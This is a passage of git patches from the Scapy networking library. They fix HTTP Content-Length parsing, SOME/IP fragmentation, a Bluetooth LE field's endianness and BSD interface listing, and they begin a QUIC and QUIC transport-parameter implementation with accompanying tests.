a/scapy/arch/bpf/pfroute.py b/scapy/arch/bpf/pfroute.py index 28eb59a5ba3..e81c2b504eb 100644 --- a/scapy/arch/bpf/pfroute.py +++ b/scapy/arch/bpf/pfroute.py @@ -1234,11 +1234,13 @@ def _get_if_list(): ifindex = msg.ifm_index ifname = None mac = "00:00:00:00:00:00" + itype = -1 ifflags = msg.ifm_flags ips = [] for addr in msg.addrs: if addr.sa_family == socket.AF_LINK: ifname = addr.sdl_iface.decode() + itype = addr.sdl_type if addr.sdl_addr: mac = addr.sdl_addr if ifname is not None: @@ -1250,5 +1252,6 @@ def _get_if_list(): "flags": ifflags, "mac": mac, "ips": ips, + "type": itype, } return interfaces diff --git a/scapy/arch/common.py b/scapy/arch/common.py index c2c8897ce8c..e2bddd3516b 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -12,7 +12,7 @@ import socket from scapy.config import conf -from scapy.data import MTU, ARPHDR_ETHER, ARPHRD_TO_DLT +from scapy.data import MTU, ARPHRD_TO_DLT from scapy.error import Scapy_Exception, warning from scapy.interfaces import network_name, resolve_iface, NetworkInterface from scapy.libs.structures import bpf_program @@ -105,8 +105,6 @@ def compile_filter(filter_exp, # type: str except Exception: # Failed to use linktype: use the interface pass - if not linktype and conf.use_bpf: - linktype = ARPHDR_ETHER if linktype is not None: ret = pcap_compile_nopcap( MTU, linktype, ctypes.byref(bpf), bpf_filter, 1, -1 diff --git a/scapy/data.py b/scapy/data.py index a577e14c090..a1a8e3c8316 100644 --- a/scapy/data.py +++ b/scapy/data.py @@ -202,7 +202,7 @@ ARPHRD_CHAOS: DLT_CHAOS, ARPHRD_CAN: DLT_LINUX_SLL, ARPHRD_IEEE802_TR: DLT_IEEE802, - ARPHRD_IEEE802: DLT_IEEE802, + ARPHRD_IEEE802: DLT_EN10MB, ARPHRD_ARCNET: DLT_ARCNET_LINUX, ARPHRD_FDDI: DLT_FDDI, ARPHRD_ATM: -1, From d208e0a9155d06e65d7033bc88a68f01a24f8f24 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 27 Feb 2025 01:34:09 +0100 Subject: [PATCH 1441/1632] Fix bad content-length (#4676) --- scapy/layers/http.py | 8 +++++++- test/scapy/layers/http.uts | 11 +++++++++++ 2 files changed, 18 insertions(+), 1 deletion(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 45e741385da..c94fecde86f 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -652,11 +652,17 @@ def tcp_reassemble(cls, data, metadata, _): is_response = isinstance(http_packet.payload, cls.clsresp) # Packets may have a Content-Length we must honnor length = http_packet.Content_Length + if length: + # Parse the length as an integer + try: + length = int(length) + except ValueError: + length = None if length is not None: # The packet provides a Content-Length attribute: let's # use it. When the total size of the frags is high enough, # we have the packet - length = int(length) + # Subtract the length of the "HTTP*" layer if http_packet.payload.payload or length == 0: http_length = len(data) - http_packet.payload._original_len diff --git a/test/scapy/layers/http.uts b/test/scapy/layers/http.uts index f81a53311ec..591c3275098 100644 --- a/test/scapy/layers/http.uts +++ b/test/scapy/layers/http.uts @@ -68,6 +68,17 @@ assert HTTPResponse in pkt print(pkt[Raw].load, expected_data) assert pkt[Raw].load == expected_data += TCPSession - Invalid Content-Length + +pkts = [ + IP()/TCP(seq=1)/HTTP()/Raw(load=b'GET / HTTP/1.1\r\nContent-Length: bad\r\nCoo'), + IP()/TCP(seq=41)/HTTP()/Raw(load=b'kie: cookie\r\n\r\n'), +] +a = sniff(offline=pkts, session=TCPSession) + +assert HTTPRequest in a[0] +assert a[0].Cookie == b"cookie" + = TCPSession - dissect HTTP 1.0 HEAD response ~ http From ee15153b9e70525599f6ffc412ddaa0017ce2a57 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 27 Feb 2025 01:35:48 +0100 Subject: [PATCH 1442/1632] Alias DLT_RAW_ALT -> DLT_RAW in compile_filter (#4677) --- scapy/arch/common.py | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/scapy/arch/common.py b/scapy/arch/common.py index e2bddd3516b..8077c3dd286 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -12,7 +12,7 @@ import socket from scapy.config import conf -from scapy.data import MTU, ARPHRD_TO_DLT +from scapy.data import MTU, ARPHRD_TO_DLT, DLT_RAW_ALT, DLT_RAW from scapy.error import Scapy_Exception, warning from scapy.interfaces import network_name, resolve_iface, NetworkInterface from scapy.libs.structures import bpf_program @@ -106,6 +106,9 @@ def compile_filter(filter_exp, # type: str # Failed to use linktype: use the interface pass if linktype is not None: + # Some conversion aliases (e.g. linktype_to_dlt in libpcap) + if linktype == DLT_RAW_ALT: + linktype = DLT_RAW ret = pcap_compile_nopcap( MTU, linktype, ctypes.byref(bpf), bpf_filter, 1, -1 ) From bff1ea03f5258f713ec900fd7bdaa546c7b566aa Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 27 Feb 2025 08:40:43 +0100 Subject: [PATCH 1443/1632] Fix #4651: Improve SOMEIP.fragment() (#4655) * Fix #4651: Improve SOMEIP.fragment() * fix flake --- scapy/contrib/automotive/someip.py | 27 ++++++++++++++++++++------ test/contrib/automotive/someip.uts | 31 +++++++++++++++++++++++++++++- 2 files changed, 51 insertions(+), 7 deletions(-) diff --git a/scapy/contrib/automotive/someip.py b/scapy/contrib/automotive/someip.py index a10cd24dc72..40d43a09fd4 100644 --- a/scapy/contrib/automotive/someip.py +++ b/scapy/contrib/automotive/someip.py @@ -13,7 +13,8 @@ from scapy.layers.inet6 import IP6Field from scapy.compat import raw, orb from scapy.config import conf -from scapy.packet import Packet, Raw, bind_top_down, bind_bottom_up, bind_layers +from scapy.packet import (Packet, Raw, bind_top_down, bind_bottom_up, + bind_layers) from scapy.fields import (XShortField, ConditionalField, BitField, XBitField, XByteField, ByteEnumField, ShortField, X3BytesField, StrLenField, IPField, @@ -176,21 +177,35 @@ def fragment(self, fragsize=1392): fnb += 1 fl = fl.underlayer + has_payload = len(self.data) == 0 or sum(len(p) for p in self.data) == 0 + for p in fl: - s = raw(p[fnb].payload) + if has_payload: + s = raw(p[fnb].payload) + else: + s = raw(p[fnb].data[0]) nb = (len(s) + fragsize) // fragsize for i in range(nb): q = p.copy() - del q[fnb].payload + if has_payload: + del q[fnb].payload + else: + del q[fnb].data[0] q[fnb].len = SOMEIP.LEN_OFFSET_TP + \ len(s[i * fragsize:(i + 1) * fragsize]) q[fnb].more_seg = 1 if i == nb - 1: q[fnb].more_seg = 0 - q[fnb].offset += i * fragsize // 16 + q[fnb].offset += i * fragsize r = conf.raw_layer(load=s[i * fragsize:(i + 1) * fragsize]) - r.overload_fields = p[fnb].payload.overload_fields.copy() - q.add_payload(r) + if has_payload: + r.overload_fields = p[fnb].payload.overload_fields.copy() + else: + r.overload_fields = p[fnb].data[0].overload_fields.copy() + if has_payload: + q.add_payload(r) + else: + q.data.append(r) lst.append(q) return lst diff --git a/test/contrib/automotive/someip.uts b/test/contrib/automotive/someip.uts index 5508b3ec6ae..ec1a38f780d 100644 --- a/test/contrib/automotive/someip.uts +++ b/test/contrib/automotive/someip.uts @@ -113,7 +113,7 @@ pstr = bytes(p) binstr = b"\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x01\x01\x00\x00" assert pstr == binstr -= Build TP fragmented += Build TP fragmented payload p = SOMEIP() p.msg_type = 0x20 p.add_payload(Raw("A"*1400)) @@ -127,6 +127,20 @@ assert f[1].payload == Raw("A"*8) assert f[0].more_seg == 1 assert f[1].more_seg == 0 += Build TP fragmented data +p = SOMEIP() +p.msg_type = 0x20 +p.data = [Raw("A"*1400)] + +f = p.fragment() + +assert f[0].len == 1404 +assert f[1].len == 20 +assert f[0].data[0] == Raw("A"*1392) +assert f[1].data[0] == Raw("A"*8) +assert f[0].more_seg == 1 +assert f[1].more_seg == 0 + + SD Entry Service = Check packet length on empty build @@ -728,6 +742,20 @@ p = SOMEIP(srv_id=1234, sub_id=4321, msg_type=0xff, retcode=0xff, offset=4294967 assert p.data[0].load == b"deadbeef" += test fragment + +msg = bytes.fromhex("aabbccdd0003aabbccdd20608100a5dc0800450005a050ad400040117ee9c0a87262c0a872037725e107058c6b54402f801e0000057c0000000e0101220000000001123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210123456789abcdef0fedcba9876543210fedcba9876543210a1b2c3d4e5f678901234567890abcdef0f1e2d3c4b5a697889abcdef01234567f0e1d2c3b4a59687111122223333444455556666777788889999aaaabbbbccccdeadbeafbaddcafecafebabedeafbeef1122334455667788a1b2c3d4e5f6f7f823456789abcdef0199887766554433221a2b3c4d5e6f7a8beaf1234567890deffedcba987654321001f23e45d6789abce1f2d3c4b5a6d7e8c9a1b2f3e4d5a6b7d8e1f0a2b3c4d5e623a1b2c3d4e5f678f23456789abcdef09876543210abcdefabcdef012345678987654321f0e1d2c312f34d56a78b9c019a8b7c6d5e4f3a2b56789abcdef0123423456789abcdef01a1b2c3d4e5f678909876543210abcdefabcdef0123456789f23456789abcdef099887766554433221a2b3c4d5e6f7a8bf0e1d2c3b4a59687abcdef9876543210234567890abcdef19999aaaabbbbccccdeadbeafbaddcafecafebabedeafbeef111122223333444455556666777788889999aaaabbbbccccdeadbeafbaddcafecafebabedeafbeef1122334455667788a1b2c3d4e5f6f7f823456789abcdef0199887766554433221a2b3c4d5e6f7a8beaf1234567890deffedcba987654321001f23e45d6789abce1f2d3c4b5a6d7e8c9a1b2f3e4d5a6b7d8e1f0a2b3c4d5e623a1b2c3d4e5f678f23456789abcdef09876543210abcdefabcdef012345678987654321f0e1d2c312f34d56a78b9c019a8b7c6d5e4f3a2b56789abcdef0123423456789abcdef01a1b2c3d4e5f678909876543210abcdefabcdef0123456789f23456789abcdef099887766554433221a2b3c4d5e6f7a8bf0e1d2c3b4a59687abcdef9876543210234567890abcdef19999aaaabbbbccccdeadbeafbaddcafecafebabedeafbeef111122223333444455556666777788889999aaaabbbbccccdeadbeafbaddcafecafebabedeafbeef1122334455667788a1b2c3d4e5f6f7f823456789abcdef0199887766554433221a2b3c4d5e6f7a8beaf1234567890deffedcba987654321001f23e45d6789abce1f2d3c4b5a6d7e8c9a1b2f3e4d5a6b7d8e1f0a2b3c4d5e623a1b2c3d4e5f678f23456789abcdef09876543210abcdefabcdef0123456789123456789abcdef01a2b3c4d5e6f70819a8b7c6d5e4f3a21d1c2b3a4f5e60798a9b8c7d6e5f4f3d2123456789abcdef01f2e3d4c5b6a7980a4b3c2d1e0f1f8a9456789abcdef0123f1e2d3c4b5a60789d6c5b4a3f2e1f0a91e2d3c4b5a6078f09c8b7a6d5e4f3b212b1a3c4d5e6f7081a7b8c9d6e5f4f0d2f5e4d3c2b1a0798a8123456789abcdef1f2e3d4c5b6a7981a3b2c1d0f1e607929081726354abcdef0f1e2d3c4b5a60788b7a6c5d4e3f2109d4c3b2a1f0e6078a4f5e6d7c8b9a1234e9d8c7b6a5f4e308a1b2c3d4e5f678909c8b7a6d5e4f32103b2a1c0d5e6f7098a0b1c2d3e4f5e6176d5e4f3c2b1a7890d7c8b9a0f1e2f390f1e2d3c4b5a607899b8a7c6d5e4f3211d3c2b1a0f1e6078b8f9e6d7c5b4a3210b2c1a3d4e5f6f8090e1d2c3b4a5f6789c9b8a7d6e5f4e3087d6c5b4a3f2e10989a8b7c6d5e4f32106e5d4c3b2a1f70980a9b8c7d6e5f4d023e1f2d4c5b6a70988f9e7d6c5b4a3102") +pkt = Ether(msg)[SOMEIP] + +x = pkt.fragment(fragsize=100) +for i, p in enumerate(x): + if i == len(x) -1: + assert p.more_seg == 0 + assert len(p.data[0]) < 100 + else: + assert p.more_seg == 1 + assert len(p.data[0]) == 100 + = SOMEIP multiple frames in one TCP/UDP payload_3 = bytes.fromhex("deadbeef") @@ -767,3 +795,4 @@ someip_23_x = someip_123_x.payload assert someip_23_x.data[0].load == payload_2 someip_3_x = someip_23_x.payload assert someip_3_x.data[0].load == payload_3 + From 20a3468a1043108676219b3629c735c06fab181f Mon Sep 17 00:00:00 2001 From: XenoKovah <92380610+XenoKovah@users.noreply.github.com> Date: Wed, 5 Mar 2025 12:00:49 +0000 Subject: [PATCH 1444/1632] bluetooth: The endinness of LL_VERSION_IND Subversion field should be little-endian. (#4662) Co-authored-by: Xeno Kovah --- scapy/layers/bluetooth4LE.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/bluetooth4LE.py b/scapy/layers/bluetooth4LE.py index be87e2bcde7..49a5798a48a 100644 --- a/scapy/layers/bluetooth4LE.py +++ b/scapy/layers/bluetooth4LE.py @@ -541,7 +541,7 @@ class LL_VERSION_IND(Packet): fields_desc = [ ByteEnumField("version", 8, BTLE_Versions), LEShortEnumField("company", 0, BTLE_Corp_IDs), - XShortField("subversion", 0) + XLEShortField("subversion", 0) ] From d63f54ed6db7c80cb8bcbd07215eb817cc2641fe Mon Sep 17 00:00:00 2001 From: kayoch1n Date: Sun, 9 Mar 2025 22:21:35 +0800 Subject: [PATCH 1445/1632] Begin implementing QUIC / QUIC TP Parameters (#4614) * Add QUIC transport parameter to tls extensions * Use objects from the typing module and update testcases for a better coverage * Merge with beggining of QUIC implementation. --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/fields.py | 2 +- scapy/layers/quic.py | 316 ++++++++++++++++++++++++++++++++ scapy/layers/tls/extensions.py | 12 ++ scapy/layers/tls/quic.py | 217 ++++++++++++++++++++++ test/scapy/layers/quic.uts | 50 +++++ test/scapy/layers/tls/tls13.uts | 88 ++++++++- 6 files changed, 683 insertions(+), 2 deletions(-) create mode 100644 scapy/layers/quic.py create mode 100644 scapy/layers/tls/quic.py create mode 100644 test/scapy/layers/quic.uts diff --git a/scapy/fields.py b/scapy/fields.py index 958824cd0cb..443a2d13124 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1696,7 +1696,7 @@ def __init__( cbk(pkt:Packet, lst:List[Packet], cur:Optional[Packet], - remain:str + remain:bytes, ) -> Optional[Type[Packet]] The pkt argument contains a reference to the Packet instance diff --git a/scapy/layers/quic.py b/scapy/layers/quic.py new file mode 100644 index 00000000000..7252128c593 --- /dev/null +++ b/scapy/layers/quic.py @@ -0,0 +1,316 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +QUIC + +The draft of a very basic implementation of the structures from [RFC 9000]. +This isn't binded to UDP by default as currently too incomplete. + +TODO: +- payloads. +- encryption. +- automaton. +- etc. +""" + +import struct + +from scapy.packet import ( + Packet, +) +from scapy.fields import ( + _EnumField, + BitEnumField, + BitField, + ByteEnumField, + ByteField, + EnumField, + Field, + FieldLenField, + FieldListField, + IntField, + MultipleTypeField, + ShortField, + StrLenField, +) + +# Typing imports +from typing import ( + Any, + Optional, + Tuple, +) + +# RFC9000 table 3 +_quic_payloads = { + 0x00: "PADDING", + 0x01: "PING", + 0x02: "ACK", + 0x04: "RESET_STREAM", + 0x05: "STOP_SENDING", + 0x06: "CRYPTO", + 0x07: "NEW_TOKEN", + 0x08: "STREAM", + 0x10: "MAX_DATA", + 0x11: "MAX_STREAM_DATA", + 0x12: "MAX_STREAMS", + 0x14: "DATA_BLOCKED", + 0x15: "STREAM_DATA_BLOCKED", + 0x16: "STREAMS_BLOCKED", + 0x18: "NEW_CONNECTION_ID", + 0x19: "RETIRE_CONNECTION_ID", + 0x1A: "PATH_CHALLENGE", + 0x1B: "PATH_RESPONSE", + 0x1C: "CONNECTION_CLOSE", + 0x1E: "HANDSHAKE_DONE", +} + + +# RFC9000 sect 16 +class QuicVarIntField(Field[int, int]): + def addfield(self, pkt: Packet, s: bytes, val: Optional[int]): + val = self.i2m(pkt, val) + if val < 0 or val > 0x3FFFFFFFFFFFFFFF: + raise struct.error("requires 0 <= number <= 4611686018427387903") + if val < 0x40: + return s + struct.pack("!B", val) + elif val < 0x4000: + return s + struct.pack("!H", val | 0x4000) + elif val < 0x40000000: + return s + struct.pack("!I", val | 0x40000000) + else: + return s + struct.pack("!Q", val | 0x4000000000000000) + + def getfield(self, pkt: Packet, s: bytes) -> Tuple[bytes, int]: + length = (s[0] & 0xC0) >> 6 + if length == 0: + return s[1:], struct.unpack("!B", s[:1])[0] & 0x3F + elif length == 1: + return s[2:], struct.unpack("!H", s[:2])[0] & 0x3FFF + elif length == 2: + return s[4:], struct.unpack("!I", s[:4])[0] & 0x3FFFFFFF + elif length == 3: + return s[8:], struct.unpack("!Q", s[:8])[0] & 0x3FFFFFFFFFFFFFFF + else: + raise Exception("Impossible.") + + +class QuicVarLenField(FieldLenField, QuicVarIntField): + pass + + +class QuicVarEnumField(QuicVarIntField, _EnumField[int]): + __slots__ = EnumField.__slots__ + + def __init__(self, name, default, enum): + # type: (str, Optional[int], Any, int) -> None + _EnumField.__init__(self, name, default, enum) # type: ignore + QuicVarIntField.__init__(self, name, default) + + def any2i(self, pkt, x): + # type: (Optional[Packet], Any) -> int + return _EnumField.any2i(self, pkt, x) # type: ignore + + def i2repr( + self, + pkt, # type: Optional[Packet] + x, # type: int + ): + # type: (...) -> Any + return _EnumField.i2repr(self, pkt, x) + + +# -- Headers -- + + +# RFC9000 sect 17.2 +_quic_long_hdr = { + 0: "Short", + 1: "Long", +} + +_quic_long_pkttyp = { + # RFC9000 table 5 + 0x00: "Initial", + 0x01: "0-RTT", + 0x02: "Handshake", + 0x03: "Retry", +} + +# RFC9000 sect 17 abstraction + + +class QUIC(Packet): + match_subclass = True + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + """ + Returns the right class for the given data. + """ + if _pkt: + hdr = _pkt[0] + if hdr & 0x80: + # Long Header packets + if hdr & 0x40 == 0: + return QUIC_Version + else: + typ = (hdr & 0x30) >> 4 + return { + 0: QUIC_Initial, + 1: QUIC_0RTT, + 2: QUIC_Handshake, + 3: QUIC_Retry, + }[typ] + else: + # Short Header packets + return QUIC_1RTT + return QUIC_Initial + + def mysummary(self): + return self.name + + +# RFC9000 sect 17.2.1 + + +class QUIC_Version(QUIC): + name = "QUIC - Version Negotiation" + fields_desc = [ + BitEnumField("HeaderForm", 1, 1, _quic_long_hdr), + BitField("Unused", 0, 7), + IntField("Version", 0), + FieldLenField("DstConnIDLen", None, length_of="DstConnID", fmt="B"), + StrLenField("DstConnID", "", length_from=lambda pkt: pkt.DstConnIDLen), + FieldLenField("SrcConnIDLen", None, length_of="DstConnID", fmt="B"), + StrLenField("SrcConnID", "", length_from=lambda pkt: pkt.SrcConnIDLen), + FieldListField("SupportedVersions", [], IntField("", 0)), + ] + + +# RFC9000 sect 17.2.2 + +QuicPacketNumberField = lambda name, default: MultipleTypeField( + [ + (ByteField(name, default), lambda pkt: pkt.PacketNumberLen == 0), + (ShortField(name, default), lambda pkt: pkt.PacketNumberLen == 1), + (IntField(name, default), lambda pkt: pkt.PacketNumberLen == 2), + ], + ByteField(name, default), +) + + +class QuicPacketNumberBitFieldLenField(BitField): + def i2m(self, pkt, x): + if x is None and pkt is not None: + PacketNumber = pkt.PacketNumber or 0 + if PacketNumber < 0 or PacketNumber > 0xFFFFFFFF: + raise struct.error("requires 0 <= number <= 0xFFFFFFFF") + if PacketNumber < 0x100: + return 0 + elif PacketNumber < 0x10000: + return 1 + elif PacketNumber < 0x100000000: + return 2 + else: + return 3 + elif x is None: + return 0 + return x + + +class QUIC_Initial(QUIC): + name = "QUIC - Initial" + Version = 0x00000001 + fields_desc = ( + [ + BitEnumField("HeaderForm", 1, 1, _quic_long_hdr), + BitField("FixedBit", 1, 1), + BitEnumField("LongPacketType", 0, 2, _quic_long_pkttyp), + BitField("Reserved", 0, 2), + QuicPacketNumberBitFieldLenField("PacketNumberLen", None, 2), + ] + + QUIC_Version.fields_desc[2:7] + + [ + QuicVarLenField("TokenLen", None, length_of="Token"), + StrLenField("Token", "", length_from=lambda pkt: pkt.TokenLen), + QuicVarIntField("Length", 0), + QuicPacketNumberField("PacketNumber", 0), + ] + ) + + +# RFC9000 sect 17.2.3 +class QUIC_0RTT(QUIC): + name = "QUIC - 0-RTT" + LongPacketType = 1 + fields_desc = QUIC_Initial.fields_desc[:10] + [ + QuicVarIntField("Length", 0), + QuicPacketNumberField("PacketNumber", 0), + ] + + +# RFC9000 sect 17.2.4 +class QUIC_Handshake(QUIC): + name = "QUIC - Handshake" + LongPacketType = 2 + fields_desc = QUIC_0RTT.fields_desc + + +# RFC9000 sect 17.2.5 +class QUIC_Retry(QUIC): + name = "QUIC - Retry" + LongPacketType = 3 + Version = 0x00000001 + fields_desc = ( + QUIC_Initial.fields_desc[:3] + + [ + BitField("Unused", 0, 4), + ] + + QUIC_Version.fields_desc[2:7] + ) + + +# RFC9000 sect 17.3 +class QUIC_1RTT(QUIC): + name = "QUIC - 1-RTT" + fields_desc = [ + BitEnumField("HeaderForm", 0, 1, _quic_long_hdr), + BitField("FixedBit", 1, 1), + BitField("SpinBit", 0, 1), + BitField("Reserved", 0, 2), + BitField("KeyPhase", 0, 1), + QuicPacketNumberBitFieldLenField("PacketNumberLen", None, 2), + # FIXME - Destination Connection ID + QuicPacketNumberField("PacketNumber", 0), + ] + + +# RFC9000 sect 19.1 +class QUIC_PADDING(Packet): + fields_desc = [ + ByteEnumField("Type", 0x00, _quic_payloads), + ] + + +# RFC9000 sect 19.2 +class QUIC_PING(Packet): + fields_desc = [ + ByteEnumField("Type", 0x01, _quic_payloads), + ] + + +# RFC9000 sect 19.3 +class QUIC_ACK(Packet): + fields_desc = [ + ByteEnumField("Type", 0x02, _quic_payloads), + ] + + +# Bindings +# bind_bottom_up(UDP, QUIC, dport=443) +# bind_bottom_up(UDP, QUIC, sport=443) +# bind_layers(UDP, QUIC, dport=443, sport=443) diff --git a/scapy/layers/tls/extensions.py b/scapy/layers/tls/extensions.py index 42dfa6f6048..e52e5a0d024 100644 --- a/scapy/layers/tls/extensions.py +++ b/scapy/layers/tls/extensions.py @@ -35,6 +35,7 @@ from scapy.layers.tls.session import _GenericTLSSessionInheritance from scapy.layers.tls.crypto.groups import _tls_named_groups from scapy.layers.tls.crypto.suites import _tls_cipher_suites +from scapy.layers.tls.quic import _QuicTransportParametersField from scapy.themes import AnsiColorTheme from scapy.compat import raw from scapy.config import conf @@ -93,6 +94,7 @@ 0x31: "post_handshake_auth", 0x32: "signature_algorithms_cert", 0x33: "key_share", + 0x39: "quic_transport_parameters", # RFC 9000 0x3374: "next_protocol_negotiation", # RFC-draft-agl-tls-nextprotoneg-03 0xff01: "renegotiation_info", # RFC 5746 @@ -697,6 +699,15 @@ class TLS_Ext_RecordSizeLimit(TLS_Ext_Unknown): # RFC 8449 ShortField("record_size_limit", None)] +class TLS_Ext_QUICTransportParameters(TLS_Ext_Unknown): # RFC9000 + name = "TLS Extension - QUIC Transport Parameters" + fields_desc = [ShortEnumField("type", 0x39, _tls_ext), + FieldLenField("len", None, length_of="params"), + _QuicTransportParametersField("params", + None, + length_from=lambda pkt: pkt.len)] + + _tls_ext_cls = {0: TLS_Ext_ServerName, 1: TLS_Ext_MaxFragLen, 2: TLS_Ext_ClientCertURL, @@ -730,6 +741,7 @@ class TLS_Ext_RecordSizeLimit(TLS_Ext_Unknown): # RFC 8449 0x33: TLS_Ext_KeyShare, # 0x2f: TLS_Ext_CertificateAuthorities, #XXX # 0x30: TLS_Ext_OIDFilters, #XXX + 0x39: TLS_Ext_QUICTransportParameters, 0x3374: TLS_Ext_NPN, 0xff01: TLS_Ext_RenegotiationInfo, 0xffce: TLS_Ext_EncryptedServerName diff --git a/scapy/layers/tls/quic.py b/scapy/layers/tls/quic.py new file mode 100644 index 00000000000..6580bd887a1 --- /dev/null +++ b/scapy/layers/tls/quic.py @@ -0,0 +1,217 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information + +""" +RFC9000 QUIC Transport Parameters +""" +import struct + +from scapy.config import conf +from scapy.fields import ( + PacketListField, + FieldLenField, + StrLenField, +) +from scapy.packet import Packet + +from scapy.layers.quic import ( + QuicVarIntField, + QuicVarLenField, + QuicVarEnumField, +) + + +_QUIC_TP_type = { + 0x00: "original_destination_connection_id", + 0x01: "max_idle_timeout", + 0x02: "stateless_reset_token", + 0x03: "max_udp_payload_size", + 0x04: "initial_max_data", + 0x05: "initial_max_stream_data_bidi_local", + 0x06: "initial_max_stream_data_bidi_remote", + 0x07: "initial_max_stream_data_uni", + 0x08: "initial_max_streams_bidi", + 0x09: "initial_max_streams_uni", + 0x0A: "ack_delay_exponent", + 0x0B: "max_ack_delay", + 0x0C: "disable_active_migration", + 0x0D: "preferred_address", + 0x0E: "active_connection_id_limit", + 0x0F: "initial_source_connection_id", + 0x10: "retry_source_connection_id", +} + +# Generic values + + +class QUIC_TP_Unknown(Packet): + name = "QUIC Transport Parameter - Scapy Unknown" + fields_desc = [ + QuicVarEnumField("type", None, _QUIC_TP_type), + QuicVarLenField("len", None, length_of="value"), + StrLenField("value", None, length_from=lambda pkt: pkt.len), + ] + + def default_payload_class(self, _): + return conf.padding_layer + + +class _QUIC_VarInt_Len(FieldLenField): + def i2m(self, pkt, x): + if x is None and pkt is not None: + fld, fval = pkt.getfield_and_val(self.length_of) + value = fld.i2len(pkt, fval) or 0 + if value < 0 or value > 0xFFFFFFFF: + raise struct.error("requires 0 <= number <= 0xFFFFFFFF") + if value < 0x100: + return 1 + elif value < 0x10000: + return 2 + elif value < 0x100000000: + return 3 + else: + return 4 + elif x is None: + return 1 + return x + + +class _QUIC_TP_VarIntValue(QUIC_TP_Unknown): + fields_desc = [ + QuicVarEnumField("type", None, _QUIC_TP_type), + _QUIC_VarInt_Len("len", None, length_of="value", fmt="B"), + QuicVarIntField("value", None), + ] + + +# RFC 9000 sect 18.2 + + +class QUIC_TP_OriginalDestinationConnectionId(QUIC_TP_Unknown): + name = "QUIC Transport Parameters - Original Destination Connection Id" + type = 0x00 + + +class QUIC_TP_MaxIdleTimeout(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Max Idle Timeout" + type = 0x01 + + +class QUIC_TP_StatelessResetToken(QUIC_TP_Unknown): + name = "QUIC Transport Parameters - Stateless Reset Token" + type = 0x02 + + +class QUIC_TP_MaxUdpPayloadSize(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Max Udp Payload Size" + type = 0x03 + + +class QUIC_TP_InitialMaxData(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Initial Max Data" + type = 0x04 + + +class QUIC_TP_InitialMaxStreamDataBidiLocal(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Initial Max Stream Data Bidi Local" + type = 0x05 + + +class QUIC_TP_InitialMaxStreamDataBidiRemote(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Initial Max Stream Data Bidi Remote" + type = 0x06 + + +class QUIC_TP_InitialMaxStreamDataUni(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Initial Max Stream Data Uni" + type = 0x07 + + +class QUIC_TP_InitialMaxStreamsBidi(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Initial Max Streams Bidi" + type = 0x08 + + +class QUIC_TP_InitialMaxStreamsUni(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Initial Max Streams Uni" + type = 0x09 + + +class QUIC_TP_AckDelayExponent(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Ack Delay Exponent" + type = 0x0A + + +class QUIC_TP_MaxAckDelay(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Max Ack Delay" + type = 0x0B + + +class QUIC_TP_DisableActiveMigration(QUIC_TP_Unknown): + name = "QUIC Transport Parameters - Disable Active Migration" + fields_desc = [ + QuicVarEnumField("type", 0x0C, _QUIC_TP_type), + QuicVarIntField("len", 0), + ] + + +class QUIC_TP_PreferredAddress(QUIC_TP_Unknown): + name = "QUIC Transport Parameters - Preferred Address" + type = 0x0D + + +class QUIC_TP_ActiveConnectionIdLimit(_QUIC_TP_VarIntValue): + name = "QUIC Transport Parameters - Active Connection Id Limit" + type = 0x0E + + +class QUIC_TP_InitialSourceConnectionId(QUIC_TP_Unknown): + name = "QUIC Transport Parameters - Initial Source Connection Id" + type = 0x0F + + +class QUIC_TP_RetrySourceConnectionId(QUIC_TP_Unknown): + name = "QUIC Transport Parameters - Retry Source Connection Id" + type = 0x10 + + +_QUIC_TP_cls = { + 0x00: QUIC_TP_OriginalDestinationConnectionId, + 0x01: QUIC_TP_MaxIdleTimeout, + 0x02: QUIC_TP_StatelessResetToken, + 0x03: QUIC_TP_MaxUdpPayloadSize, + 0x04: QUIC_TP_InitialMaxData, + 0x05: QUIC_TP_InitialMaxStreamDataBidiLocal, + 0x06: QUIC_TP_InitialMaxStreamDataBidiRemote, + 0x07: QUIC_TP_InitialMaxStreamDataUni, + 0x08: QUIC_TP_InitialMaxStreamsBidi, + 0x09: QUIC_TP_InitialMaxStreamsUni, + 0x0A: QUIC_TP_AckDelayExponent, + 0x0B: QUIC_TP_MaxAckDelay, + 0x0C: QUIC_TP_DisableActiveMigration, + 0x0D: QUIC_TP_PreferredAddress, + 0x0E: QUIC_TP_ActiveConnectionIdLimit, + 0x0F: 